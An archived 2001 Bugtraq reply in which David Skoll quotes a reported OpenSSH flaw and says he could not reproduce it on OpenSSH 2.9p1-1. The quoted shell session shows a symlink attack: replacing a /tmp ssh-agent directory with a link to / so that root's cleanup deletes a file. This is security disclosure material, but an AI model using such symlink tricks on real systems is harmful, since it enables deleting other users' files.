[20852] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: SSH allows deletion of other users files...

daemon@ATHENA.MIT.EDU (David F. Skoll)
Mon Jun 4 17:00:08 2001

Date: Mon, 4 Jun 2001 11:19:37 -0400 (EDT)
From: "David F. Skoll" <dfs@roaringpenguin.com>
To: <zen-parse@gmx.net>
Cc: <bugtraq@securityfocus.com>
In-Reply-To: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local>
Message-ID: <Pine.LNX.4.30.0106041118520.1924-100000@shishi.roaringpenguin.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 4 Jun 2001 zen-parse@gmx.net wrote:

>  [root@clarity /root]# touch /cookies;ls /cookies
>  /cookies
>  [root@clarity /root]# ssh zen@localhost
>  zen@localhost's password:
>  [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
>  [zen@clarity zen]$ logout

>  [root@clarity /root]# ls /cookies
>  /bin/ls: /cookies: No such file or directory

I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2

--
David.

home	help	back	first	fref	pref	prev	next	nref	lref	last	post